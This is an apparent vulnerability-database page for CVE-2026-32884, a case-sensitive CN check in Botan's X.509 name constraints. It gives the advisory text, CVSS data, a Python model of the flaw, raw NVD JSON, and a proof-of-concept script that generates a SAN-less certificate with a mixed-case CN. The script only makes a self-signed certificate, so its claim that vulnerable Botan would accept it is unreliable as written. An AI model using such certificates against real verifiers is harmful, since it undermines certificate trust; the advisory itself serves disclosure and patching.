Security Vulnerability Report
CVE-2026-32884 CVSS 5.9 MEDIUM

CVE-2026-32884

Published: 2026-03-30 21:17:10
Last Modified: 2026-04-13 13:52:27

Description

Botan is a C++ cryptography library. Prior to version 3.11.0, when processing an X.509 certificate path that uses name constraints to restrict the set of allowable DNS names, Botan would, if the end-entity certificate defined no subject alternative name, check that the CN was allowed by the DNS name constraints, even though this check is technically not required by RFC 5280. However, this check failed to account for the possibility of a mixed-case CN. Thus a certificate with CN=Sub.EVIL.COM and no subject alternative name would bypass an excludedSubtrees constraint for evil.com because the comparison is case-sensitive. This issue has been patched in version 3.11.0.
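The comparison flaw described above, modelled in a few lines as an added example (this is not Botan's code; all function names and sample values are hypothetical). It applies the RFC 5280 dNSName subtree rule to the CN when no SAN is present, once case-sensitively and once with both sides case-folded, and reports the names on which the two verdicts differ.

```python
# Added illustration, not Botan's implementation. Names are hypothetical.

def _labels(name: str) -> list:
    """Split a DNS name into labels, ignoring a trailing root dot."""
    return name.rstrip(".").split(".")


def in_subtree(name: str, constraint: str, *, fold_case: bool) -> bool:
    """RFC 5280 4.2.1.10 dNSName rule: a name is inside the subtree if it
    equals the constraint or adds labels on the left-hand side."""
    if fold_case:
        # DNS names compare case-insensitively, so fold both sides first.
        name, constraint = name.lower(), constraint.lower()
    n, c = _labels(name), _labels(constraint)
    # Compare whole labels from the right: "notevil.com" is not in "evil.com".
    return len(n) >= len(c) and n[len(n) - len(c):] == c


def cn_permitted(cn, san_dns, excluded, *, fold_case=True):
    """Apply excludedSubtrees to the SAN dNSNames, or to the CN when the
    certificate has no SAN (the behaviour the description attributes to Botan)."""
    candidates = san_dns if san_dns else [cn]
    return not any(in_subtree(x, e, fold_case=fold_case)
                   for x in candidates for e in excluded)


def verdict_mismatches(cns, excluded):
    """CNs that a case-sensitive check accepts but a case-folded check rejects."""
    return [cn for cn in cns
            if cn_permitted(cn, [], excluded, fold_case=False)
            and not cn_permitted(cn, [], excluded, fold_case=True)]


# Constructed sample data: one excluded subtree and four SAN-less subject CNs.
EXCLUDED = ["evil.com"]
SAMPLE_CNS = ["Sub.EVIL.COM", "sub.evil.com", "notevil.com", "www.example.org"]

if __name__ == "__main__":
    for cn in SAMPLE_CNS:
        print(cn,
              "case-sensitive:", cn_permitted(cn, [], EXCLUDED, fold_case=False),
              "case-folded:", cn_permitted(cn, [], EXCLUDED, fold_case=True))
    print("verdicts differ for:", verdict_mismatches(SAMPLE_CNS, EXCLUDED))
```

The same mismatch test can be run over the subject CNs of SAN-less certificates in an inventory to find names that a verifier built on Botan < 3.11.0 would have accepted under a constrained CA.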

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:* - VULNERABLE
Botan < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-32884
# This script demonstrates creating a certificate with a mixed-case CN
# that bypasses an excludedSubtrees constraint in vulnerable Botan versions.
import datetime

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

# 1. Generate a private key for the malicious certificate
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# 2. Create a certificate with a mixed-case Common Name (CN)
# The CN uses uppercase letters to bypass case-sensitive checks
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
    x509.NameAttribute(NameOID.COMMON_NAME, "Sub.EVIL.COM"),  # Vulnerability Trigger
])

# 3. Build the certificate without Subject Alternative Name (SAN)
now = datetime.datetime.now(datetime.timezone.utc)
cert = (
    x509.CertificateBuilder()
    .subject_name(subject)
    .issuer_name(issuer)
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=365))
    .sign(key, hashes.SHA256())
)

# 4. Save the generated certificate
with open("bypass_cert.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))

print("Certificate generated: CN=Sub.EVIL.COM")
# When verified against a constraint excluding 'evil.com',
# vulnerable Botan versions will accept this due to case sensitivity.

References

https://github.com/randombit/botan/security/advisories/GHSA-7c3g-7763-ggj5 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32884", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.093", "lastModified": "2026-04-13T13:52:26.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Botan is a C++ cryptography library. Prior to version 3.11.0, during processing of an X.509 certificate path using name constraints which restrict the set of allowable DNS names, if no subject alternative name is defined in the end-entity certificate Botan would check that the CN was allowed by the DNS name constraints, even though this check is technically not required by RFC 5280. However this check failed to account for the possibility of a mixed-case CN. Thus a certificate with CN=Sub.EVIL.COM and no subject alternative name would bypasses an excludedSubtrees constraint for evil.com because the comparison is case-sensitive. This issue has been patched in version 3.11.0."}, {"lang": "es", "value": "Botan es una biblioteca de criptografía C++. Antes de la versión 3.11.0, durante el procesamiento de una ruta de certificado X.509 utilizando restricciones de nombre que restringen el conjunto de nombres DNS permitidos, si no se define un nombre alternativo del sujeto en el certificado de entidad final, Botan verificaría que el CN estaba permitido por las restricciones de nombre DNS, aunque esta verificación técnicamente no es requerida por el RFC 5280. Sin embargo, esta verificación no tuvo en cuenta la posibilidad de un CN con mayúsculas y minúsculas. Así, un certificado con CN=Sub.EVIL.COM y sin nombre alternativo del sujeto eludiría una restricción de excludedSubtrees para evil.com porque la comparación distingue entre mayúsculas y minúsculas. 
Este problema ha sido parcheado en la versión 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "DBC9FF6C-805F-482E-9A45-8D1EC323BA96"}]}]}], "references": [{"url": "https://github.com/randombit/botan/security/advisories/GHSA-7c3g-7763-ggj5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}